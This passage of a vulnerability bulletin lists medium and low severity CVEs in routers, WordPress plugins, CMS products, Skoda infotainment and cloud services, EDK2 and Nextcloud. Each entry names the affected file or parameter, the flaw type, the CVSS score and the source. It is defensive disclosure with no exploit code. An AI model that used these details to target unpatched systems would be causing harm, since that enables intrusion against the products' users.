An Uncontrolled Resource Consumption vulnerability has been found in Sandsprite Scdbg.exe, affecting version 1.0. This vulnerability allows an attacker to send a specially crafted shellcode payload to the '/foff' parameter and cause an application shutdown. A malware program could use this shellcode sequence to shut down the application and evade the scan.
2024-01-16 | 4 | CVE-2024-0581 | cve-coordination@incibe.es

sedlex -- image_zoom
Missing Authorization vulnerability in SedLex Image Zoom. This issue affects Image Zoom: from n/a through 1.8.8.
2024-01-17 | 5.4 | CVE-2022-41619 | audit@patchstack.com

sedlex -- traffic_manager
Missing Authorization vulnerability in SedLex Traffic Manager. This issue affects Traffic Manager: from n/a through 1.4.5.
2024-01-17 | 5.4 | CVE-2022-41695 | audit@patchstack.com

sherlock -- online_fir_system
A vulnerability was found in code-projects Online FIR System 1.0. It has been classified as problematic. This affects an unknown part of the file registercomplaint.php. The manipulation of the argument Name/Address leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250611.
2024-01-13 | 6.1 | CVE-2024-0503 | cna@vuldb.com

shopware -- shopware
Shopware is an open headless commerce platform. In the Shopware CMS, the state handler for orders fails to sufficiently verify user authorizations for actions that modify the payment, delivery, and/or order status. Due to this inadequate implementation, users lacking 'write' permissions for orders are still able to change the order state. This issue has been addressed and users are advised to update to Shopware 6.5.7.4. For older versions of 6.1, 6.2, 6.3 and 6.4 corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version.
2024-01-16 | 4.9 | CVE-2024-22407 | security-advisories@github.com

skoda -- skoda
The Real-Time Streaming Protocol implementation in the MIB3 infotainment incorrectly handles requests to the /logs URI when the id parameter equals zero. This issue allows an attacker connected to the in-vehicle Wi-Fi network to cause denial-of-service of the infotainment system when certain preconditions are met. Vulnerability discovered on Škoda Superb III (3V3) - 2.0 TDI manufactured in 2022.
2024-01-12 | 5.3 | CVE-2023-28898 | cve@asrg.io

skoda -- skoda_superb_II
The secret value used for access to critical UDS services of the MIB3 infotainment is hardcoded in the firmware. Vulnerability discovered on Škoda Superb III (3V3) - 2.0 TDI manufactured in 2022.
2024-01-12 | 4 | CVE-2023-28897 | cve@asrg.io

skoda_auto -- škoda_connect
The Skoda Automotive cloud contains a Broken Access Control vulnerability, allowing attackers to obtain nicknames and other user identifiers of Skoda Connect service users by specifying an arbitrary vehicle VIN number.
2024-01-18 | 5.3 | CVE-2023-28900 | cve@asrg.io

skoda_auto -- skoda_connect
The Skoda Automotive cloud contains a Broken Access Control vulnerability, allowing remote attackers to obtain recent trip data, vehicle mileage, fuel consumption, average and maximum speed, and other information of Skoda Connect service users by specifying an arbitrary vehicle VIN number.
2024-01-18 | 5.3 | CVE-2023-28901 | cve@asrg.io
skyworthdigital -- cm5100_firmware
This vulnerability exists in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user-supplied input for the Traceroute parameter at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system. Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.
2024-01-17 | 5.4 | CVE-2023-51719 | vdisclose@cert-in.org.in

skyworthdigital -- cm5100_firmware
This vulnerability exists in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user-supplied input for the Time Server 1 parameter at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system. Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.
2024-01-17 | 5.4 | CVE-2023-51720 | vdisclose@cert-in.org.in

skyworthdigital -- cm5100_firmware
This vulnerability exists in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user-supplied input for the Time Server 2 parameter at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system. Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.
2024-01-17 | 5.4 | CVE-2023-51721 | vdisclose@cert-in.org.in

skyworthdigital -- cm5100_firmware
This vulnerability exists in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user-supplied input for the Time Server 3 parameter at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system. Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.
2024-01-17 | 5.4 | CVE-2023-51722 | vdisclose@cert-in.org.in

skyworthdigital -- cm5100_firmware
This vulnerability exists in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user-supplied input for the Description parameter at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system. Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.
2024-01-17 | 5.4 | CVE-2023-51723 | vdisclose@cert-in.org.in

skyworthdigital -- cm5100_firmware
This vulnerability exists in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user-supplied input for the URL parameter at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system. Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.
2024-01-17 | 5.4 | CVE-2023-51724 | vdisclose@cert-in.org.in

skyworthdigital -- cm5100_firmware
This vulnerability exists in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user-supplied input for the Contact Email Address parameter at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system. Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.
2024-01-17 | 5.4 | CVE-2023-51725 | vdisclose@cert-in.org.in

skyworthdigital -- cm5100_firmware
This vulnerability exists in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user-supplied input for the SMTP Server Name parameter at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system. Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.
2024-01-17 | 5.4 | CVE-2023-51726 | vdisclose@cert-in.org.in

skyworthdigital -- cm5100_firmware
This vulnerability exists in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user-supplied input for the SMTP Username parameter at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system. Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.
2024-01-17 | 5.4 | CVE-2023-51727 | vdisclose@cert-in.org.in

skyworthdigital -- cm5100_firmware
This vulnerability exists in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user-supplied input for the SMTP Password parameter at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system. Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.
2024-01-17 | 5.4 | CVE-2023-51728 | vdisclose@cert-in.org.in

skyworthdigital -- cm5100_firmware
This vulnerability exists in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user-supplied input for the DDNS Username parameter at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system. Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.
2024-01-17 | 5.4 | CVE-2023-51729 | vdisclose@cert-in.org.in

skyworthdigital -- cm5100_firmware
This vulnerability exists in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user-supplied input for the DDNS Password parameter at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system. Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.
2024-01-17 | 5.4 | CVE-2023-51730 | vdisclose@cert-in.org.in

skyworthdigital -- cm5100_firmware
This vulnerability exists in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user-supplied input for the Hostname parameter at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system. Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.
2024-01-17 | 5.4 | CVE-2023-51731 | vdisclose@cert-in.org.in

skyworthdigital -- cm5100_firmware
This vulnerability exists in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user-supplied input for the IPsec Tunnel Name parameter at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system. Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.
2024-01-17 | 5.4 | CVE-2023-51732 | vdisclose@cert-in.org.in

skyworthdigital -- cm5100_firmware
This vulnerability exists in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user-supplied input for the Identity parameter under Local endpoint settings at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system. Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.
2024-01-17 | 5.4 | CVE-2023-51733 | vdisclose@cert-in.org.in

skyworthdigital -- cm5100_firmware
This vulnerability exists in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user-supplied input for the Identity parameter under Remote endpoint settings at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system. Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.
2024-01-17 | 5.4 | CVE-2023-51734 | vdisclose@cert-in.org.in

skyworthdigital -- cm5100_firmware
This vulnerability exists in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user-supplied input for the Pre-shared key parameter at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system. Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.
2024-01-17 | 5.4 | CVE-2023-51735 | vdisclose@cert-in.org.in

skyworthdigital -- cm5100_firmware
This vulnerability exists in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user-supplied input for the L2TP/PPTP Username parameter at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system. Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.
2024-01-17 | 5.4 | CVE-2023-51736 | vdisclose@cert-in.org.in

skyworthdigital -- cm5100_firmware
This vulnerability exists in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user-supplied input for the Preshared Phrase parameter at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system. Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.
2024-01-17 | 5.4 | CVE-2023-51737 | vdisclose@cert-in.org.in

skyworthdigital -- cm5100_firmware
This vulnerability exists in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user-supplied input for the Network Name (SSID) parameter at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system. Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.
2024-01-17 | 5.4 | CVE-2023-51738 | vdisclose@cert-in.org.in

skyworthdigital -- cm5100_firmware
This vulnerability exists in Skyworth Router CM5100, version 4.1.1.24, due to insufficient validation of user-supplied input for the Device Name parameter at its web interface. A remote attacker could exploit this vulnerability by supplying specially crafted input to the parameter at the web interface of the vulnerable targeted system. Successful exploitation of this vulnerability could allow the attacker to perform stored XSS attacks on the targeted system.
2024-01-17 | 5.4 | CVE-2023-51739 | vdisclose@cert-in.org.in
smsot -- smsotA vulnerability was found in Smsot up to 2.12. It has been classified as critical. Affected is an unknown function of the file /api.php of the component HTTP POST Request Handler. The manipulation of the argument data[sign] leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251556.2024-01-196.3CVE-2024-0733
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
smsot -- smsotA vulnerability was found in Smsot up to 2.12. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /get.php. The manipulation of the argument tid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251557 was assigned to this vulnerability.2024-01-196.3CVE-2024-0734
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
sourcecodester -- online_tours_&_travels_management_systemA vulnerability was found in SourceCodester Online Tours & Travels Management System 1.0. It has been rated as critical. Affected by this issue is the function exec of the file admin/operations/expense.php. The manipulation leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-251558 is the identifier assigned to this vulnerability.2024-01-196.3CVE-2024-0735
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
sparksuite -- simplemdeA vulnerability, which was classified as problematic, was found in Sparksuite SimpleMDE up to 1.11.2. This affects an unknown part of the component iFrame Handler. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251373 was assigned to this vulnerability.2024-01-174.3CVE-2024-0647
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
sqlite -- sqliteA heap use-after-free issue has been identified in SQLite in the jsonParseAddNodeArray() function in sqlite3.c. This flaw allows a local attacker to leverage a victim to pass specially crafted malicious input to the application, potentially causing a crash and leading to a denial of service.2024-01-164.7CVE-2024-0232
secalert@redhat.com
secalert@redhat.com
swagger_UI -- fastify-swagger-uifastify-swagger-ui is a Fastify plugin for serving Swagger UI. Prior to 2.1.0, the default configuration of `@fastify/swagger-ui` without `baseDir` set will lead to all files in the module's directory being exposed via http routes served by the module. The vulnerability is fixed in v2.1.0. Setting the `baseDir` option can also work around this vulnerability.2024-01-155.3CVE-2024-22207
security-advisories@github.com
security-advisories@github.com
taokeyun -- taokeyunA vulnerability classified as critical has been found in Taokeyun up to 1.0.5. This affects the function index of the file application/index/controller/app/Video.php of the component HTTP POST Request Handler. The manipulation of the argument cid leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250587.2024-01-136.3CVE-2024-0482
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
taokeyun -- taokeyunA vulnerability classified as critical was found in Taokeyun up to 1.0.5. This vulnerability affects the function index of the file application/index/controller/app/Task.php of the component HTTP POST Request Handler. The manipulation of the argument cid leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-250588.2024-01-136.3CVE-2024-0483
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
themegrill -- colormagThe ColorMag theme for WordPress is vulnerable to unauthorized access due to a missing capability check on the plugin_action_callback() function in all versions up to, and including, 3.1.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to install and activate arbitrary plugins.2024-01-206.5CVE-2024-0679
security@wordfence.com
security@wordfence.com
security@wordfence.com
themeinprogress -- wip_custom_loginMissing Authorization vulnerability in ThemeinProgress WIP Custom Login.This issue affects WIP Custom Login: from n/a through 1.2.7.2024-01-175.4CVE-2022-42884
audit@patchstack.com
themeum -- wp_crowdfundingThe WP Crowdfunding WordPress plugin before 2.1.10 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)2024-01-154.8CVE-2023-6163
contact@wpscan.com
tianocore -- edk2EDK2's Network Package is susceptible to an out-of-bounds read vulnerability when processing the IA_NA or IA_TA option in a DHCPv6 Advertise message. This vulnerability can be exploited by an attacker to gain unauthorized access and potentially lead to a loss of Confidentiality.2024-01-166.5CVE-2023-45229
infosec@edk2.groups.io
infosec@edk2.groups.io
infosec@edk2.groups.io
tianocore -- edk2EDK2's Network Package is susceptible to an out-of-bounds read vulnerability when processing Neighbor Discovery Redirect message. This vulnerability can be exploited by an attacker to gain unauthorized access and potentially lead to a loss of Confidentiality.2024-01-166.5CVE-2023-45231
infosec@edk2.groups.io
infosec@edk2.groups.io
infosec@edk2.groups.io
tianocore -- edk2EDK2's Network Package is susceptible to a predictable TCP Initial Sequence Number. This vulnerability can be exploited by an attacker to gain unauthorized access and potentially lead to a loss of Confidentiality.2024-01-165.8CVE-2023-45236
infosec@edk2.groups.io
infosec@edk2.groups.io
tianocore -- edk2EDK2's Network Package is susceptible to a predictable TCP Initial Sequence Number. This vulnerability can be exploited by an attacker to gain unauthorized access and potentially lead to a loss of Confidentiality.2024-01-165.3CVE-2023-45237
infosec@edk2.groups.io
infosec@edk2.groups.io
totolink -- t8A vulnerability classified as problematic has been found in Totolink T8 4.1.5cu.833_20220905. This affects the function getSysStatusCfg of the file /cgi-bin/cstecgi.cgi of the component Setting Handler. The manipulation of the argument ssid/key leads to information disclosure. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.1.5cu.862_B20230228 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-250785 was assigned to this vulnerability.2024-01-164.3CVE-2024-0569
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
tribe29 -- checkmkInsufficient authentication flow in Checkmk before 2.2.0p18, 2.1.0p38 and 2.0.0p39 allows attacker to use locked credentials2024-01-126.5CVE-2023-31211
security@checkmk.com
ujcms -- ujcmsFile Upload vulnerability in Ujcms v.8.0.2 allows a local attacker to execute arbitrary code via a crafted file.2024-01-125.4CVE-2023-51806
cve@mitre.org
cve@mitre.org
cve@mitre.org
ursa -- CL-signaturesUrsa is a cryptographic library for use with blockchains. The revocation scheme that is part of the Ursa CL-Signatures implementations has a flaw that could impact the privacy guarantees defined by the AnonCreds verifiable credential model. Notably, a malicious verifier may be able to generate a unique identifier for a holder providing a verifiable presentation that includes a Non-Revocation proof. The impact of the flaw is that a malicious verifier may be able to determine a unique identifier for a holder presenting a Non-Revocation proof. Ursa has moved to end-of-life status and no fix is expected.2024-01-166.5CVE-2024-22192
security-advisories@github.com
vagary_digital -- hreflang_tags_liteMissing Authorization vulnerability in Vagary Digital HREFLANG Tags Lite.This issue affects HREFLANG Tags Lite: from n/a through 2.0.0.2024-01-176.5CVE-2022-36418
audit@patchstack.com
vektor-inc -- vk_block_patternsThe VK Block Patterns plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.31.1.1. This is due to missing or incorrect nonce validation on the vbp_clear_patterns_cache() function. This makes it possible for unauthenticated attackers to clear the patterns cache via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.2024-01-204.3CVE-2024-0623
security@wordfence.com
security@wordfence.com
webkul -- bagistoCross Site Scripting vulnerability in webkil Bagisto v.1.5.0 and before allows an attacker to execute arbitrary code via a crafted SVG file uplad.2024-01-164.8CVE-2023-36236
cve@mitre.org
cve@mitre.org
cve@mitre.org
woocommerce -- woocommerceThe WooCommerce WordPress plugin before 6.2.1 does not have proper authorisation check when deleting reviews, which could allow any authenticated users, such as subscriber to delete arbitrary comment2024-01-164.3CVE-2022-0775
contact@wpscan.com
contact@wpscan.com
contact@wpscan.com
wp_job_portal -- wp_job_portal_a_complete_job_boardMissing Authorization vulnerability in WP Job Portal WP Job Portal - A Complete Job Board.This issue affects WP Job Portal - A Complete Job Board: from n/a through 2.0.1.2024-01-175.4CVE-2022-41786
audit@patchstack.com
wpfastestcache -- wp_fastest_cacheThe WP Fastest Cache WordPress plugin before 0.9.5 is lacking a CSRF check in its wpfc_save_cdn_integration AJAX action, and does not sanitise and escape some the options available via the action, which could allow attackers to make logged in high privilege users call it and set a Cross-Site Scripting payload2024-01-166.1CVE-2021-24870
contact@wpscan.com
contact@wpscan.com
wpmet -- wp_social_login_and_register_social_counterExposure of Sensitive Information to an Unauthorized Actor vulnerability in Wpmet Wp Social Login and Register Social Counter.This issue affects Wp Social Login and Register Social Counter: from n/a through 1.9.0.2024-01-196.5CVE-2022-47160
audit@patchstack.com
x.org -- x.orgA flaw was found in the X.Org server. The GLX PBuffer code does not call the XACE hook when creating the buffer, leaving it unlabeled. When the client issues another request to access that resource (as with a GetGeometry) or when it creates another resource that needs to access that buffer, such as a GC, the XSELINUX code will try to use an object that was never labeled and crash because the SID is NULL.2024-01-185.5CVE-2024-0408
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
secalert@redhat.com
xlightftpd -- xlight_ftp_serverA vulnerability classified as problematic was found in Xlightftpd Xlight FTP Server 1.1. This vulnerability affects unknown code of the component Login. The manipulation of the argument user leads to denial of service. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251560.2024-01-195.3CVE-2024-0737
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
yikesinc -- easy_forms_for_mailchimpThe Easy Forms for Mailchimp WordPress plugin through 6.8.10 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed2024-01-154.8CVE-2023-4925
contact@wpscan.com
zhihuiyun -- download_network_imageA vulnerability was found in ZhiHuiYun up to 4.4.13 and classified as critical. This issue affects the function download_network_image of the file /app/Http/Controllers/ImageController.php of the component Search. The manipulation of the argument url leads to server-side request forgery. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251375.2024-01-176.3CVE-2024-0649
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
zhongfucheng3y -- austinA vulnerability was found in ZhongFuCheng3y Austin 1.0. It has been rated as critical. Affected by this issue is the function getRemoteUrl2File of the file src\main\java\com\java3y\austin\support\utils\AustinFileUtils.java of the component Email Message Template Handler. The manipulation leads to server-side request forgery. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-250838 is the identifier assigned to this vulnerability.2024-01-166.3CVE-2024-0601
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
zhongfucheng3y_austin -- zhongfucheng3y_austinA vulnerability was found in ZhongFuCheng3y Austin 1.0 and classified as critical. This issue affects the function getFile of the file com/java3y/austin/web/controller/MaterialController.java of the component Upload Material Menu. The manipulation leads to unrestricted upload. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-250619.2024-01-135.5CVE-2024-0505
cna@vuldb.com
cna@vuldb.com
cna@vuldb.com
zorem -- advanced_local_pickup_for_woocommerceMissing Authorization vulnerability in Zorem Advanced Local Pickup for WooCommerce.This issue affects Advanced Local Pickup for WooCommerce: from n/a through 1.5.2.2024-01-175.4CVE-2022-40702
audit@patchstack.com
zorem -- sales_report_email_for_woocommerceMissing Authorization vulnerability in Zorem Sales Report Email for WooCommerce. This issue affects Sales Report Email for WooCommerce: from n/a through 2.8.2024-01-174.3CVE-2022-38141
audit@patchstack.com


Low Vulnerabilities

Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info
apple -- magic_keyboard_firmware | A session management issue was addressed with improved checks. This issue is fixed in Magic Keyboard Firmware Update 2.0.6. An attacker with physical access to the accessory may be able to extract its Bluetooth pairing key and monitor Bluetooth traffic. | 2024-01-12 | 2.4 | CVE-2024-0230 | product-security@apple.com
atrocore -- atropim | A vulnerability, which was classified as problematic, was found in AtroCore AtroPIM 1.8.4. This affects an unknown part of the file /#ProductSerie/view/ of the component Product Series Overview. The manipulation leads to cross-site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251481 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-18 | 3.5 | CVE-2024-0696 | cna@vuldb.com
beijing_baichuo -- smart_s150_management_platform | A vulnerability classified as problematic has been found in Beijing Baichuo Smart S150 Management Platform V31R02B15. This affects an unknown part of the file /log/download.php of the component Backup File Handler. The manipulation leads to information disclosure. It is possible to initiate the attack remotely. The complexity of an attack is rather high and exploitation is reported to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-251541 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-19 | 3.1 | CVE-2024-0716 | cna@vuldb.com
dedebiz -- dedebiz | A vulnerability, which was classified as problematic, was found in DedeBIZ 6.3.0. This affects an unknown part of the component Website Copyright Setting. The manipulation leads to cross-site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250725 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-15 | 2.4 | CVE-2024-0557 | cna@vuldb.com
dgtlmoon -- changedetection.io | changedetection.io is an open source tool designed to monitor websites for content changes. In affected versions the API endpoint `/api/v1/watch/<uuid>/history` can be accessed by any unauthorized user, so any unauthorized user can read a watch's history. However, because the unauthorized party first needs to know the watch UUID, and the watch history endpoint itself returns only paths to snapshots on the server, the impact on users' data privacy is minimal. This issue has been addressed in version 0.45.13. Users are advised to upgrade. There are no known workarounds for this vulnerability. | 2024-01-19 | 3.7 | CVE-2024-23329 | security-advisories@github.com
discourse -- discourse | Discourse-reactions is a plugin that allows users to add reactions to a post. Data about a user's reaction notifications could be exposed. This vulnerability was patched in commit 2c26939. | 2024-01-12 | 3.5 | CVE-2023-49098 | security-advisories@github.com
discourse -- discourse | Discourse is a platform for community discussion. Under very specific circumstances, secure upload URLs associated with posts can be accessed by guest users even when login is required. This vulnerability has been patched in 3.2.0.beta4 and 3.1.4. | 2024-01-12 | 3.1 | CVE-2023-49099 | security-advisories@github.com
factominer -- factoinvestigate | A vulnerability, which was classified as problematic, was found in FactoMineR FactoInvestigate up to 1.9. Affected is an unknown function of the component HTML Report Generator. The manipulation leads to cross-site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251544. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. | 2024-01-19 | 3.5 | CVE-2024-0720 | cna@vuldb.com
freerdp -- freerdp | FreeRDP is a set of free and open source remote desktop protocol libraries and clients. In affected versions an integer overflow in `freerdp_bitmap_planar_context_reset` leads to a heap buffer overflow. This affects FreeRDP-based clients. FreeRDP-based server implementations and the proxy are not affected. A malicious server could prepare a `RDPGFX_RESET_GRAPHICS_PDU` to allocate too-small buffers, possibly triggering a later out-of-bounds read/write. Data extraction over the network is not possible; the buffers are used to display an image. This issue has been addressed in versions 2.11.5 and 3.2.0. Users are advised to upgrade. There are no known workarounds for this vulnerability. | 2024-01-19 | 3.7 | CVE-2024-22211 | security-advisories@github.com
gluwa -- creditcoin | Creditcoin is a network that enables cross-blockchain credit transactions. The Windows binary of the Creditcoin node loads a suite of DLLs provided by Microsoft at startup. If a malicious user has access to overwrite the program files directory it is possible to replace these DLLs and execute arbitrary code. It is the view of the blockchain development team that the threat posed by a hypothetical binary planting attack is minimal and represents a low security risk. The vulnerable DLL files are from the Windows networking subsystem, the Visual C++ runtime, and low-level cryptographic primitives. Collectively these dependencies are required for a large ecosystem of applications, ranging from enterprise-level security applications to game engines, and don't represent a fundamental lack of security or oversight in the design and implementation of Creditcoin. The blockchain team takes the stance that running Creditcoin on Windows is officially unsupported and at best should be thought of as experimental. | 2024-01-17 | 3.3 | CVE-2024-22410 | security-advisories@github.com
hcl_software -- hcl_bigfix_osd_bare_metal_server_webui | HCL BigFix OSD Bare Metal Server WebUI version 311.19 or lower can sometimes include sensitive information in a query string, which could allow an attacker to execute a malicious attack. | 2024-01-16 | 2.3 | CVE-2023-37521 | psirt@hcl.com
ibm -- qradar_siem | IBM QRadar SIEM 7.5 could disclose sensitive email information in responses from offense rules. IBM X-Force ID: 275709. | 2024-01-17 | 3.7 | CVE-2023-50950 | psirt@us.ibm.com
jspxcms -- jspxcms | A vulnerability was found in Jspxcms 10.2.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file src\main\java\com\jspxcms\core\web\back\InfoController.java of the component Document Management Page. The manipulation of the argument title leads to cross-site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-250837 was assigned to this vulnerability. | 2024-01-16 | 3.5 | CVE-2024-0599 | cna@vuldb.com
jspxcms -- jspxcms | A vulnerability has been found in Jspxcms 10.2.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the component Survey Label Handler. The manipulation leads to cross-site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251545 was assigned to this vulnerability. | 2024-01-19 | 3.5 | CVE-2024-0721 | cna@vuldb.com
lenovo -- tablet | An information disclosure vulnerability was reported in the Lenovo Tab M8 HD that could allow a local application to gather a non-resettable device identifier. | 2024-01-19 | 3.3 | CVE-2023-5081 | psirt@lenovo.com
liuwy-dlsdys -- zhglxt | A vulnerability, which was classified as problematic, has been found in liuwy-dlsdys zhglxt 4.7.7. This issue affects some unknown processing of the file /oa/notify/edit of the component HTTP POST Request Handler. The manipulation of the argument notifyTitle leads to cross-site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-251543. | 2024-01-19 | 2.4 | CVE-2024-0718 | cna@vuldb.com
nextcloud -- security-advisories | Nextcloud User Saml is an app for authenticating Nextcloud users using SAML. In affected versions users can be given a link to the Nextcloud server and end up on an uncontrolled third-party server. It is recommended that the User Saml app is upgraded to version 5.1.5, 5.2.5, or 6.0.1. There are no known workarounds for this issue. | 2024-01-18 | 3.1 | CVE-2024-22400 | security-advisories@github.com
nextcloud -- security-advisories | Nextcloud server is a self-hosted personal cloud system. In affected versions OAuth codes did not expire: an attacker who obtained an authorization code could authenticate at any time using it. As of version 28.0.0 OAuth codes are invalidated after 10 minutes and will no longer be accepted for authentication. To exploit this vulnerability an attacker would need to intercept an OAuth code from a user session. It is recommended that the Nextcloud Server is upgraded to 28.0.0. There are no known workarounds for this vulnerability. | 2024-01-18 | 3.0 | CVE-2024-22403 | security-advisories@github.com
